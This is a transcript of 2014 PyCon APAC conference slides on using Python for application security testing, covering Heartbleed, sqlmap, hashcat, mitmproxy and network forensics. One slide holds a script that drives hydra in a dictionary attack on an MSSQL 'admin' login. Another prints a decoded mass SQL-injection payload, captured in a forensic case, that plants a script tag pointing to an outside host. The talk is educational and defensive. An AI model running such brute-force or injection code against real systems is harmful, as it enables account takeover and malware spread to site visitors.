Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Python for Application Security Testing

za
May 18, 2014

Python for Application Security Testing

My slides at PyCon APAC 2014
https://tw.pycon.org/2014apac/en/program/38

za

May 18, 2014
Tweet

More Decks by za

Other Decks in Technology

Transcript

  1. Python for Application Security Testing
    Zaki Akhmad
    PyCon APAC 2014
    May 18, 2014
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 1 / 41

    View full-size slide

  2. hen gao xing ren shi ni
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 2 / 41

    View full-size slide

  3. About Me
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 3 / 41

    View full-size slide

  4. Zaki Akhmad
    @zakiakhmad
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 4 / 41

    View full-size slide

  5. Python Indonesia Meetup Organizer
    Planet Python Indonesia Maintainer
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 5 / 41

    View full-size slide

  6. Security Analyst
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 6 / 41

    View full-size slide

  7. This talk won’t be a rocket-science talk
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 7 / 41

    View full-size slide

  8. Heartbleed
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 8 / 41

    View full-size slide

  9. Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 9 / 41

    View full-size slide

  10. Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 10 / 41

    View full-size slide

  11. Python script to test heartbleed vulnerability
    https://github.com/musalbas/heartbleed-masstest
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 11 / 41

    View full-size slide

  12. Detect and Exploit SQL Injection
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 12 / 41

    View full-size slide

  13. Exploits of a Mom, XKCD #327
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 13 / 41

    View full-size slide

  14. #1. Injection
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 14 / 41

    View full-size slide

  15. SQL Injection is (mostly) about
    the unauthorized DBMS data access
    Miroslav Stampar, sqlmap Developer
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 15 / 41

    View full-size slide

  16. SQL Injection techniques:
    Blind
    Error
    Union (partial and full)
    Time
    Stacked
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 16 / 41

    View full-size slide

  17. sqlmap - Project Statistic
    http://www.ohloh.net/p/sqlmap
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 17 / 41

    View full-size slide

  18. Dump DBMS database table entries
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 18 / 41

    View full-size slide

  19. Contribution
    Feature request
    Configure output directory
    Retrieve database server IP address
    Add Indonesian common-columns
    Bug
    [CRITICAL] unhandled exception
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 19 / 41

    View full-size slide

  20. Identify Hash Algorithm
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 20 / 41

    View full-size slide

  21. If you found hashed passwords with a-f,0-9 and length 32, it might be: MD5
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 21 / 41

    View full-size slide

  22. hash-identifier: python script to identify hashes algorithm
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 22 / 41

    View full-size slide

  23. We need to know the hash algorithm to crack it
    Security is only as strong as the weakest link
    And the most frequent weakest link is password
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 23 / 41

    View full-size slide

  24. $ hashcat-0.47 ./hashcat-cli64.bin --help
    hashcat, advanced password recovery
    Usage: hashcat [options] hashfile [mask|wordfiles|directories]
    ...
    Hash type
    0 = MD5
    10 = md5($pass.$salt)
    50 = HMAC-MD5 (key = $pass)
    100 = SHA1
    200 = MySQL
    400 = phpass, MD5(Wordpress), MD5(phpBB3)
    500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
    800 = SHA-1(Django)
    hashcat: advanced password recovery
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 24 / 41

    View full-size slide

  25. hydra: A very fast network logon cracker
    dictionary attack: trying to login using words in the dictionary
    python script to execute hydra for multiple dictionary files (wordlists)
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 25 / 41

    View full-size slide

  26. hydra-multiple-wordlist.py
    import threading
    import os
    from subprocess importcall
    def listdir_fullpath(d):
    return [os.path.join(d, f) for f in os.listdir(d)]
    def main():
    wordlists = listdir_fullpath("/home/za/tools/wordlist")
    for wordlist in wordlists:
    print in progress using %s wordlist % wordlist
    call([hydra, -l, admin, -P, wordlist,
    192.168.99.66,mssql,-v, -t, 128])
    print done
    if __name__ == __main__:
    main()
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 26 / 41

    View full-size slide

  27. Proxy - Network Traffic
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 27 / 41

    View full-size slide

  28. web browser - proxy - server
    mobile apps - proxy - server
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 28 / 41

    View full-size slide

  29. mitmproxy
    mitmproxy: a man-in-the-middle proxy
    intercept, modify, replay and save HTTP/S traffic
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 29 / 41

    View full-size slide

  30. mitmproxy
    analyzing HTTPS connection
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 30 / 41

    View full-size slide

  31. mitmproxy
    analyzing POST request
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 31 / 41

    View full-size slide

  32. Network Forensic
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 32 / 41

    View full-size slide

  33. Client: We have deployed (network) firewall
    but we still got attacked by SQL injection
    Starting the forensic by capturing all network traffic
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 33 / 41

    View full-size slide

  34. sqlinject-finder
    Script parses through a pcap and looks for common SQL inject characteristics
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 34 / 41

    View full-size slide

  35. sqlinject-finder
    # tcpdump -i eth0 port 80 -s0
    -G 3600 -w packet_%Y%m%d.%H%M.pcap
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 35 / 41

    View full-size slide

  36. sqlinject-finder
    $ python sqlinject-finder.py -f packet_20140518.1530.pcap
    Source : xxx.80.8.88
    Page : /transfertoasp.aspx
    Value : id=143) declar @s varchar(4000) i
    set @s=cast(0x20736557420616e7369....
    Frame : 52653
    Reason : Possible use of SQL syntax in variable
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 36 / 41

    View full-size slide

  37. sqlinject-finder
    We need to decode it
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 37 / 41

    View full-size slide

  38. sqlinject-finder
    #!/usr/bin/python
    import binascii
    binascii.unhexlify()
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 38 / 41

    View full-size slide

  39. sqlinject-finder
    Decoded packet
    set ansi_warnings off DECLARE @T
    VARCHAR(255), @C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME,c.COLUMN_NAME from
    INFORMATION_SCHEMA.columns c,
    INFORMATION_SCHEMA.tables t where
    c.DATA_TYPE in (\’nvarchar\’,
    \’varchar\’, \’ntext\’, \’text\’,and
    c.CHARACTER_MAXIMUM_LENGHT>30 and
    t.table_name=c.table_name and
    t.table_type=\’BASE TABLE\’
    OPEN Table_Cursor FETCH NEXT FROM
    Table_Cursor INTO @T,
    @C WHILE(@@FETCH_STATUS=0)
    BEGIN EXEC(\’UPDATE
    [\’+@T+\’] SET [\’+@C+\’]=\’\’">
    src="http://enswdzq112aazz.com/s1.php">
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 39 / 41

    View full-size slide

  40. Wrap Up
    Heartbleed
    SQL injection
    Hash algorithm
    Proxy
    Network forensic
    ... and many more!
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 40 / 41

    View full-size slide

  41. Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 41 / 41

    View full-size slide